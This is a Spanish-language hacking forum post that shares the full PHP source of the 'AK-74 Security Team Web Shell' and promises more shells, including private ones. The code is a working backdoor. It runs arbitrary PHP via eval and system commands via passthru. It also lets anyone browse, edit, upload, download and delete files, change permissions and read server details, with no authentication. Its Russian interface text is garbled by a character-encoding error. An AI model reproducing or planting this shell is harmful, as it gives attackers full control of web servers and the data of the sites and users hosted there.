Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Shell] AK-74 Security Team Web Shell Beta Version!

  • 0 Respuestas
  • 1480 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Abril 27, 2013, 10:11:08 am »
Bueno cerre mi wordpress, No puedo darles una visualizacion de las shells que ire subiendo, Muchos las conocen a estas shells, es bueno tenerlas aunque sean viejas! subire algunas shells privadas tambien! Saludos!

Código: PHP
  1. <?
  2. /*                              
  3.  
  4. .:: :[AK-74 Security Team Web Shell Beta Version]: ::.
  5.  
  6. - AK-74 Security Team Web Site: www.ak74-team.net
  7. - Released on 01 June 2006.
  8. - Copyright AK-74 Security Team, 2006.
  9. - Thank you for using our script.
  10.  
  11. */
  12. $xshell = $SERVER_['PHP_SELF'];
  13. class shell
  14. {
  15.  
  16.  function getfiles()
  17.  {
  18.   $mas = array();
  19.   $i = 0;
  20.   if ($handle = opendir($_SESSION['currentdir']))
  21.   {
  22.    while (false !== ($file = readdir($handle)))
  23.    if ($file != '..')
  24.     if (!is_dir($_SESSION['currentdir'].'/'.$file))
  25.         {
  26.      $mas[$i]['filename'] = $file;
  27.          $mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
  28.          $mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
  29.          $i++;
  30.         }
  31.    closedir($handle);
  32.   }
  33.   return $mas;
  34.  }
  35.  
  36.  function getdirs()
  37.  {
  38.   $mas = array();
  39.   if ($handle = opendir($_SESSION['currentdir']))
  40.   {
  41.    while (false !== ($dir = readdir($handle)))
  42.     if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
  43.      $mas[] = $dir;
  44.    closedir($handle);
  45.   }
  46.   return $mas;
  47.  }
  48.  
  49.  function geturl()
  50.  {
  51.   if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
  52.    return '/';
  53.   if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
  54.    return '';
  55.   return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
  56.  }
  57.  
  58.  
  59.  function removefile()
  60.  {
  61.   if (file_exists($_GET['file']))
  62.   {
  63.    chmod($_GET['file'],0777);
  64.    if (unlink($_GET['file']))
  65.     return 'Ôàéë óäàëåí!';
  66.    else
  67.     return 'Ôàéë óäàëåí!';
  68.   }
  69.   else
  70.    return 'Ôàéë íå íàéäåí!';
  71.  }
  72.  
  73.   function removedir()
  74.  {
  75.    chmod($_GET['dir'],0777);
  76.    if (rmdir($_GET['dir']))
  77.     return 'Äèðåêòîðèÿ óäàëåíà!';
  78.    else
  79.     return 'Äèðåêòîðèÿ íå íàéäåía!';
  80.  }
  81.  
  82. function getmicrotime()
  83. {
  84.  list($usec, $sec) = explode(" ",microtime());
  85.  return ((float)$usec + (float)$sec);
  86. }
  87.  
  88. function getpermission($path)
  89. {
  90.  
  91. $perms = fileperms($path);
  92.  
  93. if (($perms & 0xC000) == 0xC000)
  94.  $info = 's';
  95. elseif (($perms & 0xA000) == 0xA000)
  96.  $info = 'l';
  97. elseif (($perms & 0x8000) == 0x8000)
  98.  $info = '-';
  99. elseif (($perms & 0x6000) == 0x6000)
  100.  $info = 'b';
  101. elseif (($perms & 0x4000) == 0x4000)
  102.  $info = 'd';
  103. elseif (($perms & 0x2000) == 0x2000)
  104.  $info = 'c';
  105. elseif (($perms & 0x1000) == 0x1000)
  106.  $info = 'p';
  107. else
  108.  $info = 'u';
  109.  
  110. $info .= (($perms & 0x0100) ? 'r' : '-');
  111. $info .= (($perms & 0x0080) ? 'w' : '-');
  112. $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  113.  
  114. $info .= (($perms & 0x0020) ? 'r' : '-');
  115. $info .= (($perms & 0x0010) ? 'w' : '-');
  116. $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  117.  
  118. $info .= (($perms & 0x0004) ? 'r' : '-');
  119. $info .= (($perms & 0x0002) ? 'w' : '-');
  120. $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  121.  
  122. return $info;
  123. }
  124.  
  125. function getpermissionarray($path)
  126. {
  127. $res = array();
  128. $perms = fileperms($path);
  129.  
  130. if (($perms & 0xC000) == 0xC000)
  131.  $res[] = 's';
  132. elseif (($perms & 0xA000) == 0xA000)
  133.  $res[] = 'l';
  134. elseif (($perms & 0x8000) == 0x8000)
  135.  $res[] = '-';
  136. elseif (($perms & 0x6000) == 0x6000)
  137.  $res[] = 'b';
  138. elseif (($perms & 0x4000) == 0x4000)
  139.  $res[] = 'd';
  140. elseif (($perms & 0x2000) == 0x2000)
  141.  $res[] = 'c';
  142. elseif (($perms & 0x1000) == 0x1000)
  143.  $res[] = 'p';
  144. else
  145.  $res[] = 'u';
  146.  
  147. $res[] = (($perms & 0x0100) ? 'r' : '-');
  148. $res[] = (($perms & 0x0080) ? 'w' : '-');
  149. $res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  150.  
  151. $res[] = (($perms & 0x0020) ? 'r' : '-');
  152. $res[] = (($perms & 0x0010) ? 'w' : '-');
  153. $res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  154.  
  155. $res[] = (($perms & 0x0004) ? 'r' : '-');
  156. $res[] = (($perms & 0x0002) ? 'w' : '-');
  157. $res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  158.  
  159. return $res;
  160. }
  161.  
  162. function outputhead()
  163. {
  164. $res = '';
  165. $res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
  166. <body>
  167. <STYLE>
  168. A:link {
  169.         COLOR: #4d6d91; TEXT-DECORATION: underline
  170. }
  171. A:active {
  172.         COLOR: #4d6d91; TEXT-DECORATION: underline
  173. }
  174. A:visited {
  175.         COLOR: #4d6d91; TEXT-DECORATION: underline
  176. }
  177. A:hover {
  178.         COLOR: #C10000; TEXT-DECORATION: underline
  179. }
  180. TD {
  181.         FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
  182. }
  183. BODY {
  184.         FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc;
  185. }
  186. </STYLE>
  187. <div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
  188. <tr>
  189.  <td colspan=7 align="center">
  190.   <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
  191.  </td>
  192. </tr>';
  193. return $res;
  194. }
  195.  
  196. function outputmenu()
  197. {
  198.  $res = '';
  199.  $res .= '<tr>
  200.  <td colspan=7 align="center">
  201.   <table border=0 cellspacing=0 cellpadding=0>
  202.    <tr align="center">
  203.          <td width=150>
  204.           <a href="'.$xshell.'?act=info">Îáùàÿ èíôîðìàöèÿ</a>
  205.          </td>
  206.          <td width=150>
  207.           <a href="'.$xshell.'?act=filemanager">Ôàéëîâûé ìåíåäæåð</a>
  208.          </td>
  209.          <td width=80>
  210.           <a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
  211.          </td>
  212.          <td width=110>
  213.           <a href="'.$xshell.'?act=execute">Âûïîëíèòü PHP</a>
  214.          </td>
  215.          <td width=150>
  216.           <a href="'.$xshell.'?act=exesys">Âûïîëíèòü êîìàíäó</a>
  217.          </td>
  218.      </tr>
  219.   </table>
  220.  </td>
  221. </tr>';
  222.  return $res;
  223. }
  224.  
  225. function outputdown()
  226. {
  227.  $res = '';
  228.  $res .= '</table></div></body></html>';
  229.  return $res;
  230. }
  231.  
  232. function outputfilemanager()
  233. {
  234. $res = '';
  235. $number = 0;
  236. $dirs = $this->getdirs();
  237. $files = $this->getfiles();
  238. sort($dirs);
  239. sort($files);
  240.  
  241. $res .= '
  242. <tr>
  243.  <td colspan=7 align="center">
  244.  <font color=#830000> Òåêóùàÿ äèðåêòîðèÿ:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
  245.  </td>
  246. </tr>
  247. <tr align="center">
  248.  <td width=30>
  249.   &nbsp;
  250.  </td>
  251.  <td width=330>
  252.   &nbsp;
  253.  </td>
  254.  <td width=80><font color=#830000>Ðàçìåð,</font> <b><font color=#830000>áàéò</font></b>
  255.   &nbsp;
  256.  </td>
  257.  <td width=120><font color=#830000>
  258.   Ïîñëåäíåå èçìåíåíèå
  259.   </font>
  260.  </td>
  261.  <td width=80 align="center"><font color=#830000>Ïðàâà äîñòóïà</font>
  262.   &nbsp;
  263.  </td>
  264.  <td width=30>
  265.   &nbsp;
  266.  </td>
  267.  <td width=30>
  268.   &nbsp;
  269.  </td>
  270. </tr>';
  271.  
  272. for ($i = 0; $i < count($dirs); $i++)
  273. {
  274.  $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td>&nbsp;</td><td>&nbsp;</td><td>';
  275.  $res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
  276.  $res .= '</td><td>&nbsp;</td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
  277. }
  278. for ($i = 0; $i < count($files); $i++)
  279. {
  280.  $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
  281.  $res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
  282.  $res .= '<td>&nbsp;&nbsp;'.$files[$i]['filesize'].'</td>';
  283.  $res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
  284.  $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
  285.  $res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
  286.  $res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
  287. }
  288. $res .= '</table><br>';
  289.  
  290. $res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
  291. $res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>Ñîçäàòü äèðåêòîðèþ:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
  292. $res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>Ñîçäàòü ôàéë:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
  293. $res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>Çàêà÷àòü ôàéë:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>è ïðèñâîèòü èìÿ</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="Âïåð¸ä"></form></td></tr>';
  294. $res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
  295. $res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  296. return $res;
  297. }
  298.  
  299. function outputinfo()
  300. {
  301.  $res = '';
  302.  $res .= '<tr>
  303.  <td align="center" colspan=7>
  304.   <b><font color=#83000>Îáùàÿ èíôîðìàöèÿ î ñåðâåðå</font></b>
  305.  </td>
  306. </tr>
  307. <tr>
  308.  <td colspan=7 align="left"><br>
  309.   <ol>
  310.    <b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
  311.    <b><font color=#830000>2.  Âåðñèÿ PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
  312.    <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
  313.    <b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
  314.    <b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
  315.    <b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
  316.    <b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
  317.         <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
  318. </td>
  319. </tr>
  320. <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
  321. <tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  322.  
  323.  return $res;
  324. }
  325.  
  326. function chmodform($file)
  327. {
  328. $perms = $this->getpermissionarray($file);
  329. $res = '';
  330. $res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
  331.        .'<input type="hidden" name="file" value="'.$file.'">
  332. <tr>
  333.  <td align="center" colspan=7>
  334.   <b><font color=#83000>Èçìåíåíèå ïðàâ äîñòóïà</font></b>
  335.  </td>
  336. </tr>
  337. <tr>
  338.  <td colspan=7 align="center">
  339.   <table border=1 cellspacing=0 cellpadding=0>';
  340. $res .= '<tr align="center"><td>&nbsp;</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
  341. $res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
  342. for ($i = 1; $i <= 9; $i++)
  343.  $res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
  344. $res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="Ñîõðàíèòü"></td></tr>';
  345. $res .= '</table></td></tr></form>';
  346. return $res;
  347. }
  348.  
  349. function editfileform($file)
  350. {
  351. $fp = fopen($file,'r');
  352. if (!$fp)
  353.  return 'Ðåäàêòèðîâàíèå ôàéëà';
  354. $res = '';
  355. $res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
  356.        .'<input type="hidden" name="file" value="'.$file.'"><tr>
  357.  <td align="center" colspan=7>
  358.   <b><font color=#83000>Ðåäàêòèðîâàíèå ôàéëà</font></b>
  359.  </td>
  360. </tr>
  361. <tr>
  362.  <td colspan=7 align="center">
  363.   <table border=1 cellspacing=0 cellpadding=0>';
  364.  $res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
  365.  $res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="Ðåäàêòèðîâàòü"></td></tr>';
  366.  $res .= '</table></td></tr></form>';
  367.  fclose($fp);
  368.  return $res;
  369. }
  370.  
  371. function executeform()
  372. {
  373.  $res = '';
  374.  $res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
  375. <tr>
  376.  <td align="center" colspan=7>
  377.   <b><font color=#83000>Âûïîëíåíèå PHP-êîäà<br> Îòêðûòèå è çàêðûòèå PHP êîäà ( &lt;? è ?> ) ïèñàòü íå íóæíî!</font></b>
  378.  </td>
  379. </tr>
  380. <tr>
  381.  <td colspan=7 align="center">
  382.   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
  383.  $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
  384. <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
  385. <tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  386.  return $res;
  387. }
  388.  
  389. function execute()
  390. {
  391. echo "<hr>";
  392. echo "<pre>";
  393. eval(stripslashes($_POST['phpcode']));
  394. echo "</pre>";
  395. echo "<hr>";
  396.  }
  397.  
  398. function exesysform()
  399. {
  400.  $res = '';
  401.   $res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
  402. <tr>
  403.  <td align="center" colspan=7>
  404.   <b><font color=#83000>Execute system commands!</font></b>
  405.  </td>
  406. </tr>
  407. <tr>
  408.  <td colspan=7 align="center">
  409.   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
  410.  $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
  411. <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
  412. <tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  413.  return $res;
  414. }
  415.  
  416. function exesys()
  417. {
  418. echo "<hr>";
  419. echo "<pre>";
  420. $result = passthru($_POST['cmmd']);
  421. echo "</pre>";
  422. echo "<hr>";
  423. }
  424.  
  425. function editfile($file)
  426. {
  427. if (!empty($_POST['rename'])) {
  428. rename ($_POST['file'], $_POST['rename']);
  429. }
  430.  $fp = fopen($_POST['rename'],'w');
  431.  if (!$fp)
  432.   return 0;
  433.  fwrite($fp, stripslashes($_POST['filecontent']));
  434.  fclose($fp);
  435.  return 1;
  436. }
  437.  
  438. function chmodfile($file)
  439. {
  440.  $res = 0;
  441.  switch ($_POST['perms0'])
  442.  {
  443.   case 's':
  444.    $res = $res | 0xC000;
  445.   break;
  446.   case 'l':
  447.    $res = $res | 0xA000;
  448.   break;
  449.   case '-':
  450.    $res = $res | 0x8000;
  451.   break;
  452.   case 'b':
  453.    $res = $res | 0x6000;
  454.   break;
  455.   case 'd':
  456.    $res = $res | 0x4000;
  457.   break;
  458.   case 'c':
  459.    $res = $res | 0x2000;
  460.   break;
  461.   case 'p':
  462.    $res = $res | 0x1000;
  463.   break;
  464.   case 'u':
  465.  
  466.   break;
  467.  }
  468. if (isset($_POST['perms1']))
  469.  $res = $res | 0x0100;
  470. if (isset($_POST['perms2']))
  471.  $res = $res | 0x0080;
  472. if (isset($_POST['perms3']))
  473.  $res = $res | 0x0040;
  474.  
  475. if (isset($_POST['perms4']))
  476.  $res = $res | 0x0020;
  477. if (isset($_POST['perms5']))
  478.  $res = $res | 0x0010;
  479. if (isset($_POST['perms6']))
  480.  $res = $res | 0x0008;
  481.  
  482. if (isset($_POST['perms7']))
  483.  $res = $res | 0x0004;
  484. if (isset($_POST['perms8']))
  485.  $res = $res | 0x0002;
  486. if (isset($_POST['perms9']))
  487.  $res = $res | 0x0001;
  488. echo substr(sprintf('%o', $res), -4);
  489. return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
  490.  
  491. }
  492.  
  493. function downloadfile($file)
  494. {
  495. header ("Content-Type: application/octet-stream");
  496. header ("Content-Length: " . filesize($file));
  497. header ("Content-Disposition: attachment; filename=$file");
  498. readfile($file);
  499. die();
  500. }
  501.  
  502. function createdir()
  503. {
  504.  if (!empty($_POST['dircreate']))
  505.   if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
  506.    return 'Äèðåêòîðèÿ ñîçäàíà!';
  507.    
  508.  return 'Îøèáêà ïðè ñîçäàíèè äèðåêòîðèè';
  509. }
  510.  
  511. function createfile()
  512. {
  513.  if (!empty($_POST['filecreate']))
  514.  {
  515.   if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
  516.    return 'Ôàéë óæå ñóùåñòâóåò';
  517.   $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
  518.   if ($fp)
  519.   {
  520.    fclose($fp);
  521.    return 'Ôàéë ñîçäàí!';
  522.   }
  523.  }
  524.    
  525.  return 'Îøèáêà ïðè ñîçäàíèè ôàéëà';
  526. }
  527.  
  528. function uploadfile()
  529. {
  530.  if ($_FILES['filename']['error'] != 0)
  531.   return '121212';
  532.  $_POST['filename2'] = trim($_POST['filename2']);
  533.  if (empty($_POST['filename2']))
  534.   $_POST['filename2'] = $_FILES['filename']['name'];
  535.  if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
  536.   if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
  537.    return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
  538.  return 'Çàêà÷êà ôàéëà ïðîèçâåäåíà óñïåøíî!';
  539. }
  540.  
  541. }
  542.  $shell = new shell();
  543.  $timestart = $shell->getmicrotime();
  544.  $content = '';
  545.  if (!isset($_SESSION['currentdir']))
  546.   $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
  547.  if (isset($_GET['dir']))
  548.  {
  549.   if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
  550.    $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
  551.   Header("Location: $xshell?act=filemanager");
  552.  }
  553.  
  554.  $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
  555.  if (substr($_SESSION['currentdir'],-1,1) == '/')
  556.   $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
  557.  
  558.  switch ($_POST['action'])
  559.  {
  560.   case 'chmod':
  561.    if($shell->chmodfile($_POST['file']))
  562.     $content .= 'Ñìåíà ïðàâ ïðîèçîøëà óñïåøíî';
  563.   break;
  564.  
  565.   case 'editfile':
  566.    if ($shell->editfile($_POST['file']))
  567.     $content .= 'Ðåäàêòèðîâàíèå ïðîèçîøëî óñïåøíî';
  568.   break;
  569.  
  570.   case 'execute':
  571.    $shell->execute();
  572.   break;
  573.  
  574.   case 'exesys':
  575.    $shell->exesys();
  576.   break;
  577.  
  578.   case 'mkdir':
  579.    $content .= $shell->createdir();
  580.   break;
  581.  
  582.   case 'createfile':
  583.    $content .= $shell->createfile();
  584.   break;
  585.  
  586.   case 'uploadfile':
  587.    $content .= $shell->uploadfile();
  588.   break;
  589.  }
  590.  $content .= $shell->outputhead();
  591.  $content .= $shell->outputmenu();
  592.  
  593.  switch ($_GET['act'])
  594.  {
  595.   case 'edit':
  596.    $content .= $shell->editfileform($_GET['file']);
  597.   break;
  598.  
  599.   case 'chmod':
  600.    $content .= $shell->chmodform($_GET['file']);
  601.   break;
  602.  
  603.   case 'down':
  604.    $content .= $shell->downloadfile($_GET['file']);
  605.   break;
  606.  
  607.   case 'filemanager':
  608.   if ($_GET['act2'] == 'del')
  609.     $content .= $shell->removefile();
  610.     $content .= $shell->outputfilemanager();
  611.   if ($_GET['act3'] == 'del')
  612.     $content .= $shell->removedir();
  613.   break;
  614.  
  615.   case 'phpinfo':
  616.    phpinfo();
  617.    die();
  618.   break;
  619.  
  620.   case 'info':
  621.    $content .= $shell->outputinfo();
  622.   break;
  623.  
  624.   case 'execute':
  625.    $content .= $shell->executeform();
  626.   break;
  627.  
  628.   case 'exesys':
  629.    $content .= $shell->exesysform();
  630.   break;
  631.  }
  632.  
  633.  $content .= $shell->outputdown();
  634.  
  635.  echo $content;
  636.  echo '<center>Âðåìÿ ãåíåðàöèè: '.($shell->getmicrotime()-$timestart).'</center>';
  637. ?>
« Última modificación: Marzo 27, 2014, 05:33:03 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Seguridad y Proteccion a nivel web. [Version I] [Explicado]

Iniciado por Xt3mP

Respuestas: 2
Vistas: 1169
Último mensaje Enero 27, 2011, 11:32:04 am
por Xt3mP
IBOT V1.3 nueva versión! BOT IRC

Iniciado por alexander1712

Respuestas: 3
Vistas: 1446
Último mensaje Noviembre 24, 2013, 11:57:56 pm
por AΞRCRΞA
IBOT v1.4 Versión final.

Iniciado por alexander1712

Respuestas: 0
Vistas: 1552
Último mensaje Noviembre 25, 2013, 01:13:11 pm
por alexander1712
[Aporte] Windows PHP Terminal [Beta]

Iniciado por Miusi

Respuestas: 0
Vistas: 1209
Último mensaje Enero 19, 2011, 01:14:27 pm
por Miusi
Php Reverse Shell Socket Duda.

Iniciado por hdbreaker

Respuestas: 2
Vistas: 1635
Último mensaje Julio 13, 2012, 12:20:53 am
por hdbreaker